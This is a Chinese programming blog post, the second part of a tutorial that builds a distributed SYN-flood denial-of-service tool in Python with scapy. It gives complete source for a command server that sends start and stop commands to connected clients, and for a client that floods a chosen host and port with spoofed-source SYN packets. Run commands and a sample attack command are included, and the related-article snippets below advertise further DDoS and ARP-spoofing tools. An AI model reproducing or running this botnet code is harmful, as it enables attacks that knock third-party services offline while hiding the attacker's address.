python模拟ddos攻击_用Python-scapy实现SYNDdos攻击(2)

最新推荐文章于 2024-04-29 10:49:28 发布
最新推荐文章于 2024-04-29 10:49:28 发布
阅读量517 收藏 2
点赞数
文章标签: python模拟ddos攻击

四在第一篇学习了基础知识,本篇实现Server和Client的编码实现

Server端

由于Server端能等待Client主动连接,所以在Server端发送命令,控制Client端发起SYN泛洪攻击。

实现主函数的完整逻辑,在主函数中创建socket, 绑定所有网络地址和58868端口并开始监听,之后新开一个线程来等待客户端的连接,以免阻塞输入命令。

def main():

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.bind(('0.0.0.0', 58868))

s.listen(1024)

t = Thread(target=waitConnect,args=(s,))

t.start()

print('Wait at least a client connection!')

while not len(socketList): #主函数中我们第一次输入命令之前需要至少有一个客户端连接到服务器

pass

print('It has been a client connection!')

while True: print('=' * 50)

print('The command format:"#-H xxx.xxx.xxx.xxx -p xxxx -c "')

#等待输入命令

cmd_str = input('Please input cmd:')

if len(cmd_str):

if cmd_str[0] == '#':

sendCmd(cmd_str) ##如果满足了,我们就把命令发送给所有客户端。

编写主函数中没有完成的子功能。 首先我们应该实现等待客户端的函数,方便开启新的线程。

#等待连接

def waitConnect(s):

while True:

sock,addr = s.accept()

if sock not in socketList: #新连接的socket要判断一下是否在socketList中已经存储过了,如果没有的话就添加到socketList中

socketList.append(sock)

#发送命令

def sendCmd(cmd):

print('Send command......')

for sock in socketList:

sock.send(cmd.encode('utf-8'))

Client端

在Client端实现对主机的SYN泛洪攻击,并在脚本启动后主动连接Server端,等待Server端发送命令。

在主函数中先创建ArgumentParser()对象,并将需要解析的命令参数添加好。

def main():

p = argparse.ArgumentParser()

p.add_argument('-H', dest='host', type=str)

p.add_argument('-p', dest='port', type=int)

p.add_argument('-c', dest='cmd', type=str)```

```

#测试我们连接到本地地址的58868端口吧!之后我们就可以等待服务器发送命令了。

try:

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

s.connect(('127.0.0.1',58868)) print('To connected server was success!')

print("=" * 40)

cmdHandle(s,p)

```

except:

print('The network connected failed!')

print('Please restart the script!')

sys.exit(0)

将接收命令和处理命令定义在了一个单独的函数中。在这里用到了一个全局变量,用于判断是否有进程正在发起SYN泛洪攻击。之后就开始循环接收命令了,接收之后到的数据是byte型,需要对其进行解码,解码之后才是字符串。如果接收到的数据长度为0,就跳过后续的内容,重新接收数据。

处理命令

def cmdHandle(sock,parser):

global curProcess

while True:

#接收命令

data = sock.recv(1024).decode('utf-8')

if len(data) == 0:

print('The data is empty')

continue

如果数据的长度不为0,就判断是否具有命令基本格式的特征(#),满足基本条件就需要用我们的ArgumentParser对象来解析命令了

if data[0] == '#':

try: #解析命令

options = parser.parse_args(data[1:].split())

m_host = options.host m_port = options.port

m_cmd = options.cmd

命令参数解析出来后,我么就要判断到底是start命令还是stop命令了,如果是start命令,我们首先判断当前是否有进程在运行,如果有进程判断进程是否存活。如果当前有进程正在发起SYN泛洪攻击,我们就先结束这个进程,并清空屏幕。然后我们就直接启动一个进程,发起SYN泛洪攻击

DDoS启动命令

if m_cmd.lower() == 'start':

if curProcess != None and curProcess.is_alive():

#结束进程

curProcess.terminate() curProcess = None

os.system('clear')

print('The synFlood is start')

p = Process(target=synFlood,args=(m_host,m_port))

p.start() curProcess = p

DDoS停止命令

elif m_cmd.lower() =='stop':

if curProcess.is_alive():

curProcess.terminate()

os.system('clear')

except:

print('Failed to perform the command!')

###五、测试

- 运行Server脚本

``` sudo python3 ddosSrv.py ```

- 运行Client脚本

```sudo python3 ddosCli.py ```

- 输入一个命令测试一下

```#-H x.x.x.x -p 80 -c start ```

#####Client端源代码:

!/usr/bin/python3

-- coding: utf-8 --

import sys

import socket

import random

import argparse

from multiprocessing import Process

from scapy.all import *

import os

isWorking = False

curProcess = None

SYN泛洪攻击

def synFlood(tgt,dPort):

print('='100)

print('The syn flood is running!')

print('='100)

srcList = ['201.1.1.2','10.1.1.102','69.1.1.2','125.130.5.199']

for sPort in range(1024,65535):

index = random.randrange(4)

ipLayer = IP(src=srcList[index], dst=tgt)

tcpLayer = TCP(sport=sPort, dport=dPort,flags="S")

packet = ipLayer / tcpLayer

send(packet)

命令格式'#-H xxx.xxx.xxx.xxx -p xxxx -c '

处理命令

def cmdHandle(sock,parser):

global curProcess

while True:

#接收命令

data = sock.recv(1024).decode('utf-8')

if len(data) == 0:

print('The data is empty')

return

if data[0] == '#':

try:

#解析命令

options = parser.parse_args(data[1:].split())

m_host = options.host

m_port = options.port

m_cmd = options.cmd

#DDoS启动命令

if m_cmd.lower() == 'start':

if curProcess != None and curProcess.is_alive():

curProcess.terminate()

curProcess = None

os.system('clear')

print('The synFlood is start')

p = Process(target=synFlood,args=(m_host,m_port))

p.start()

curProcess = p

#DDoS停止命令

elif m_cmd.lower() =='stop':

if curProcess.is_alive():

curProcess.terminate()

os.system('clear')

except:

print('Failed to perform the command!')

def main():

#添加需要解析的命令

p = argparse.ArgumentParser()

p.add_argument('-H', dest='host', type=str)

p.add_argument('-p', dest='port', type=int)

p.add_argument('-c', dest='cmd', type=str)

print("*" * 40)

try:

#创建socket对象

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

#连接到服务器端

s.connect(('127.0.0.1',58868))

print('To connected server was success!')

print("=" * 40)

#处理命令

cmdHandle(s,p)

except:

print('The network connected failed!')

print('Please restart the script!')

sys.exit(0)

if name == 'main':

main()

结束

weixin_39956022
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BoNeSi(模拟DDoS攻击流量的工具)安装测试
weixin_43811883的博客
09-10 3209
BoNeSi介绍: BoNeSi,DDoS僵尸网络模拟器是一种测试平台环境中模拟僵尸网络流量的工具。它旨在研究DDoS攻击的影响。 ddos-protection-from-your-host-2.png 可以生成什么流量? BoNeSi从定义的僵尸网络大小(不同的IP地址)生成ICMP,UDP和TCP(HTTP)泛洪攻击。BoNeSi具有高度可配置性,可以配置速率,数据量,源IP地址,URL和其...
pythonddossocket_用Python-scapy实现SYNDdos攻击(2)
weixin_42662293的博客
01-29 253
四在第一篇学习了基础知识,本篇实现Server和Client的编码实现Server端由于Server端能等待Client主动连接,所以在Server端发送命令,控制Client端发起SYN泛洪攻击实现主函数的完整逻辑,在主函数中创建socket, 绑定所有网络地址和58868端口并开始监听,之后新开一个线程来等待客户端的连接,以免阻塞输入命令。def main():s = socket.sock...
僵尸网络项目代码-DDOS攻击复现-研究报告
LDX的博客
09-19 3525
实践是检验真理的唯一标准,通过本文的两个项目,学者可以更好的体会僵尸网络,继而去研究如何进行有效的防护,并在本项目的基础上进一步的完善,笔者认为可以开发一个针对僵尸网络DDOS攻击的项目,并在本项目上进行实践,验证效果。本文的两个项目都是在本地模拟环境下实现的僵尸网络攻击,若要进行进一步的、更深入的去研究僵尸网络,笔者认为可以在两个项目的基础上进一步完善,扩展到局域网、互联网环境下的僵尸网络,同时僵尸主机也不要仅限于本地端口,可以利用一些简单的漏洞和病毒去操控真实的主机。
Kali Linux三种网络攻击方法总结(DDoS、CC和ARP欺骗)
韩束一叶子
04-29 1570
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。现在,我的手机虽然可以上网,但是速度慢的出奇,几分钟都打不开一个网页图片,这就说明我们的ARP欺骗成功了。我的手机,IP位192.168.0.100就出现在了这里,我们就拿我的手机作为攻击目标,
DDos-Attack攻击器教程(kali linux)
热门推荐
小陈的日常生活
06-22 1万+
这个攻击器全部是由python编写的 1.配置环境 首先你需要一台电脑(废话!没电脑我还学个P)好了,开玩笑的嘻嘻 你需要一个kali linunx 当然VM也可以 2.复制我的DDos-Attack工具 (1)打开Kali linunx终端 (2)输入:git clone https://github.com/xhs753/DDos-Attack (3)等待几秒 (4)输入:cd DDoS-Attack-Guy进入到这个目录中 (5)输入:chmod +x attack-guy.py命令赋予其权限 (6)
使用多线程模拟Ddos攻击
weixin_33819479的博客
04-02 873
2019独角兽企业重金招聘Python工程师标准>>> ...
DDoS攻击实验笔记
weixin_52034407的博客
04-07 3120
DDoS攻击实验笔记
Python项目 基于Scapy实现SYN泛洪攻击的方法
01-20
python3版本的Scapy–Scapy3k来实现一个简单的DDos。 首先实现SYN泛洪攻击(SYN Flood,是一直常用的DOS方式之一,通过发送大量伪造的TCP连接请求,使被攻击主机资源耗尽的攻击方式)。TCP三次握手的过程在这里就...
Python3 基于 Scapy 实现 DDos-内含源码以及设计说明书(可以自己运行复现).zip
最新发布
05-08
总的来说,这个项目提供了从理论到实践的学习机会,让你深入理解 DDoS 攻击的工作原理,以及如何使用 Python3 和 Scapy 这样的工具来实现它们。同时,它也提醒我们,技术的双刃剑特性要求我们在掌握工具的同时,也要...
基于python实现的网络攻击,计算最大连通组 负载与级联失效.rar
05-02
5. **Python实现网络攻击模拟**:使用Python,可以通过创建网络模型,模拟不同类型的攻击,并计算在攻击下的最大连通组。例如,可以利用NetworkX库构建网络拓扑,然后模拟DoS攻击,通过删除或改变边来模拟节点失效,...
Python项目开发实战_操作系统判断渗透测试_编程案例解析实例详解课程教程.pdf
05-02
通过Scapy,我们可以进行主机发现、端口扫描、ARP嗅探以及分布式拒绝服务(DDoS攻击等网络安全活动。 在Python 3中,Scapy被重命名为Kamene,以保持对新版本Python的兼容性。在本项目中,我们将使用Kamene模块,...
NTP-Monlist-Amplification-Attack:演示NTP放大攻击
06-29
攻击者可以利用这个特性发动分布式拒绝服务(DDoS攻击。 Monlist命令在设计时并未考虑安全性,因为它会返回最近与服务器通信的1000个IP地址。攻击者通过伪装成受害者的IP地址向NTP服务器发送Monlist请求,服务器...
记一次模拟成功的ddos攻击
m0_73371371的博客
08-04 104
Python实现DDos攻击实例详解
2301_80240808的博客
11-27 3025
SYN泛洪攻击是一种比较常用的Dos方式之一。通过发送大量伪造的 TCP 连接请求,使被攻击主机资源耗尽(通常是 CPU 满负荷或内存不足)的攻击方式。我们都知道建立 TCP 连接需要三次握手。正常情况下客户端首先向服务器端发送SYN报文,随后服务端返回以SYN+ACK报文,最后客户端向服务端发送ACK报文完成三次握手
全网最全系统学习爬虫教程,用爬虫进行数据分析(bs4,xpath,正则表达式)
m0_59164304的博客
05-25 2233
1.bs4解析基础 2.bs4案例 3.xpath解析基础 4.xpath解析案例-4k图片解析爬取 5.xpath解析案例-58二手房 6.xpath解析案例-爬取站长素材中免费简历模板 7.xpath解析案例-全国城市名称爬取 8.正则解析 9.正则解析-分页爬取 10.爬取图片 1.bs4解析基础 from bs4 import BeautifulSoup fp = open('第三章 数据分析/text.html','r',encoding='utf-8') soup = BeautifulSo
2021-10-17 DDos攻击
夕阳的街道的博客
10-17 1111
aaa
如何用Python进行DDOS攻击?【网络攻防篇】
qq_68725483的博客
10-21 677
【代码】如何用Python进行DDOS攻击?【网络攻防篇】
Python实现DDOS攻击
weixin_42660646的博客
08-25 7828
Socket 套接字(socket)是一个抽象层,应用程序可以通过它发送或接收数据,可对其进行像对文件一样的打开、读写和关闭等操作。套接字允许应用程序将I/O插入到网络中,并与网络中的其他应用程序进行通信。网络套接字是IP地址与端口的组合。 使用Python socket自带库发送数据包 import socket #一句话导入socket库 import random #下面要构建数...
Python-DDoS攻击
YunWisdom
06-27 7528
背景: 网络传输层中,一般采用TCP协议,如果要建立连接,客户端会先发送syn包请求,服务器接收,接收后,再传递给客户端ack,syn包,这个时候,客户端再次回应,传回ack包。可是问题就出在,如果我是客户端,只发送一个请求syn包,然后第三次握手的时候,不再往回传ack包,此时服务端是不是就要等待? 在等待的时间里,我是不是可以伪造更多的请求,从而不断消耗服务器的资源,...
python--scapy
09-02
Scapy是一个强大的Python库,用于网络数据包的创建、发送和分析。它允许用户以非常灵活的方式构造自定义网络协议包,并且可以通过各种方式与网络进行交互。下面是一些Scapy的基本用法示例: 1. 导入Scapy库: ```python from scapy.all import * ``` 2. 构造和发送网络数据包: ```python # 创建一个IP数据包 ip_packet = IP(dst="192.168.0.1") # 创建一个TCP数据包 tcp_packet = TCP(dport=80) # 发送数据包 send(ip_packet/tcp_packet) ``` 3. 接收和分析网络数据包: ```python # 设置网络接口 interface = "eth0" # 开启网络监听 sniff(iface=interface, filter="tcp", count=10, prn=lambda x: x.summary()) ``` 这只是Scapy的一小部分功能,它还支持更多高级特性,如网络探测、MITM攻击等。你可以参考Scapy的官方文档和示例代码来了解更多信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值